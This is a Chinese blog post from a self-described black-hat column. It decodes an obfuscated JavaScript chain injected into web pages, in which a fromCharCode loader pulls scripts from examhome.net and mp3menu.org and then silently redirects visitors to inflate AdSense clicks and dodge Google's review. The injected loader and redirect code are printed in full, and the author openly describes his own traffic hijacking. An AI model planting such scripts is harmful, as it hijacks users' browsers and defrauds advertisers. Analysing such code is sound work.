专栏名称: 黑帽互联
黑帽技能传播者。分享有趣的Hack技能
目录
相关文章推荐
新加坡眼  ·  围棋泰斗齐聚新加坡,棋圣会议尘封往事 ·  16 小时前  
新加坡眼  ·  PR可以在新加坡买组屋吗? ·  16 小时前  
新加坡眼  ·  想体验正宗的泼水节?新加坡也可以! ·  16 小时前  
新加坡眼  ·  新加坡30亿洗钱案财产这样处置 ·  16 小时前  
51好读  ›  专栏  ›  黑帽互联

一个黑阔高手的ADSENSE EMU操作分享

黑帽互联  · 公众号  ·  · 2018-09-27 23:55

正文

温馨提示

如果你喜欢本文,请分享到朋友圈,想要获得更多信息,请关注我。




来自全球主机交流论坛的一个帖子




话说平时除了看看自己的bbs.affadsense.com论坛,偶尔还会去hostloc上看看。



有那么一个帖子,比较好玩,圈内的朋友都知道,我流量大部分是劫持的,所以,如果有人也是做劫持,那么我就喜欢去研究一下。


既然做了加密,那么让我这个同样喜欢做劫持的老农民来一层一层剥下来?







JS解密


解密比较简单,直接用console.log即可

我们获取到了这样的代码


var somestring = document.createElement('script'); somestring.type = 'text/javascript'; somestring.async = true;somestring.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 101, 120, 97, 109, 104, 111, 109, 101, 46, 110, 101, 116, 47, 115, 116, 97, 116, 46, 106, 115, 63, 118, 61, 50, 46, 50, 46, 50, 46, 50, 46, 50);   var alls = document.getElementsByTagName('script'); var nt3 = true; for ( var i = alls.length; i--;) { if (alls[i].src.indexOf(String.fromCharCode(101, 120, 97, 109, 104, 111, 109, 101)) > -1) { nt3 = false;} } if(nt3 == true){document.getElementsByTagName("head")[0].appendChild(somestring); }

我们继续把加密的用console.log给解密下即可

最后代码如下:


var somestring = document.createElement('script');

somestring.type = 'text/javascript';

somestring.async = true;

somestring.src = "https://examhome.net/stat.js?v=2.2.2.2.2";

var alls = document.getElementsByTagName('script');

var nt3 = true;

for (var i = alls.length; i--;) {

if (alls[i].src.indexOf("examhome") > -1) {

nt3 = false;

}

}

if (nt3 == true) {

document.getElementsByTagName("head")[0].appendChild(somestring);

}


我来解释下这段代码的意思


通过 document.getElementsByTagName获取tagname是script的元素,然后判断是否已经加载了 https://examhome.net/stat.js?v=2.2.2.2.2 这段JS


如果没有,那么就加载进去!



因为如果加载同样的JS,会引起冲突。所以一个就够啦。



继续追入


我们继续跟进https://examhome.net/stat.js?v=2.2.2.2.2 这段代码

继续一样的操作,有没有枯燥?反正我们要耐心的来。


解密结果如下:


然后继续解密并整理。

var simplelement = document.createElement('script');

simplelement.type = 'text/javascript';

simplelement.src = String.fromCharCode("https://mp3menu.org/mp3.js");

simplelement.async = true;

document.getElementsByTagName("head")[0].appendChild(simplelement);


这里又用到了 https://mp3menu.org/mp3.js

这里肯定不是一个MP3那么简单,反正糊弄我,不存在。我们继续解密,解密方式一样,这个没经过什么好的加密,所以为了不显得枯燥,我这里直接给出我的结果啦~~


我很体贴人 有没有~~

没错,我就是这么体贴~

(function() {

if (document.cookie.indexOf("mp3menu=") >= 0) {


} else {

expiry = new Date();

expiry.setTime(expiry.getTime()+(10*60*1000*6*8));

document.cookie = "mp3menu=yes; expires=" + expiry.toGMTString();

var mp3menu = "https://mp3menu.org/red.php"

window.location.replace(mp3menu);

window.location.href = mp3menu;

}

})();


继续解释,判断是否存在 mp3menu的饼干值,


如果存在,不进行任何动作


不存在,那么就植入cookie(" mp3menu=yes "),还有过期的时间,并且替换网址跳转到

https://mp3menu.org/red.php   这个中转站。




我们模拟一下浏览器看看什么效果



这里不好复现,只能截图


劫持后打开是这样子




我们浏览器打开对应的跳转后的网站是这样子




这个就是这个Adsense EMU鬼的地方



我们对比以上截图,一个是可以大量提高ADSENSE CTR点击率,一个就比较普通了。很明显,这个ADSENSE玩家是故意这么做,来规避谷歌ADSENSE EMU团队的审查。

此时,我感觉我得召唤出柯南君附体了!!!!


柯南柯南柯南。阿西吧~~~附体!!!!!

柯南柯南柯南。阿西吧~~~附体!!!!!

柯南柯南柯南。阿西吧~~~附体!!!!!




猫腻之处



如何发现这个猫腻呢?我们用国内 国外 不同的IP来模拟,然后打开CHROME的F12功能

这样就可以抓他的跳转记录了




国内IP打开的特点




看图说话吧。



国外IP打开特点





国内跟国外,中间一层跳转的网址是不一样的。




为什么网页的广告不一样呢?






请到「今天看啥」查看全文